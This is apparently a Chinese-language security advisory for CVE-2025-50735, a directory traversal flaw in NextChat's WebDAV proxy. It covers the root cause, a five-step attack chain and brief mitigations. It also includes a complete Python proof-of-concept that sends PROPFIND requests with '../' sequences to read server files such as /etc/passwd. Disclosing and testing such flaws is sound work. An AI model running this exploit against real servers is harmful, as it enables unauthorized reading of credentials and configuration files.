CVE-2025-50735 NextChat WebDAV目录遍历漏洞

漏洞信息

漏洞编号

CVE-2025-50735

漏洞类型

目录遍历

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NextChat

漏洞概述

CVE-2025-50735是NextChat应用中的一个高危目录遍历漏洞。该漏洞存在于NextChat 2.16.0及以下版本的WebDAV代理功能中。由于WebDAV代理的catch-all路由未能正确规范化或拒绝点路径段（dot path segments），攻击者可以通过构造特殊的路径遍历序列（如../）来访问应用服务器上的敏感文件。攻击者可以利用此漏洞在无需认证的情况下（针对匿名WebDAV端点）或通过已认证会话读取系统敏感文件，包括配置文件、凭据、环境变量等。该漏洞的CVSS评分为7.5，属于高危级别，对机密性造成严重影响，但不影响数据完整性和可用性。

技术细节

该漏洞的技术根源在于NextChat的WebDAV代理路由处理不当。具体来说，问题出在app/api/webdav/[...path]/route.ts文件中的catch-all路由实现。攻击者可以通过在URL路径中插入路径遍历序列（如../）来绕过安全限制。例如，使用类似/api/webdav/../../etc/passwd的路径可以访问系统敏感文件。漏洞的核心问题是WebDAV代理未能对用户提供的路径进行规范化处理（canonicalization），没有过滤或拒绝包含点路径段的请求。攻击者可以利用WebDAV协议的特性和NextChat的路由处理缺陷，结合目录遍历技术读取服务器上的任意文件。在某些配置下，匿名用户也可能利用此漏洞获取敏感信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标NextChat实例，确认版本<=2.16.0且WebDAV功能可用

STEP 2

步骤2

攻击者构造包含路径遍历序列的恶意WebDAV请求，如/api/webdav/../../etc/passwd

STEP 3

步骤3

攻击者发送PROPFIND请求到恶意构造的URL，利用catch-all路由的路径遍历漏洞

STEP 4

步骤4

WebDAV代理未能规范化路径，允许../序列通过，服务器返回请求的文件内容

STEP 5

步骤5

攻击者获取敏感文件内容，可能包括配置文件、环境变量、凭据等信息

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-50735 PoC - NextChat WebDAV Directory Traversal
# Target: NextChat <= 2.16.0

def exploit(target_url, file_path):
    """
    Exploit directory traversal in NextChat WebDAV proxy
    Args:
        target_url: Base URL of vulnerable NextChat instance
        file_path: Path to file to read (e.g., '../../../etc/passwd')
    """
    # Construct malicious WebDAV request with path traversal
    # The vulnerable endpoint is /api/webdav/[...path]
    
    traversal_path = '../../../' + file_path
    exploit_url = f"{target_url.rstrip('/')}/api/webdav/{traversal_path}"
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Accept': '*/*',
        'Destination': f'http://localhost/{traversal_path}'
    }
    
    try:
        # Send PROPFIND request (WebDAV method)
        response = requests.request('PROPFIND', exploit_url, headers=headers, timeout=10)
        
        print(f"[*] Request URL: {exploit_url}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response:\n{response.text}")
        
        if response.status_code == 207 or response.status_code == 200:
            print("[+] Successfully retrieved file contents!")
            return True
        else:
            print("[-] Exploitation failed or file not accessible")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == '__main__':
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <file_path>")
        print(f"Example: python {sys.argv[0]} http://localhost:3000 /etc/passwd")
        sys.exit(1)
    
    target = sys.argv[1]
    file_path = sys.argv[2]
    exploit(target, file_path)

影响范围

NextChat <= 2.16.0

防御指南

临时缓解措施

如果无法立即升级，可临时禁用WebDAV功能或通过Web服务器配置限制对/api/webdav/*路径的访问。同时实施网络层面的访问控制，限制只有受信任的IP地址可以访问WebDAV端点。监控日志中的异常路径遍历请求模式，及时发现和阻止攻击行为。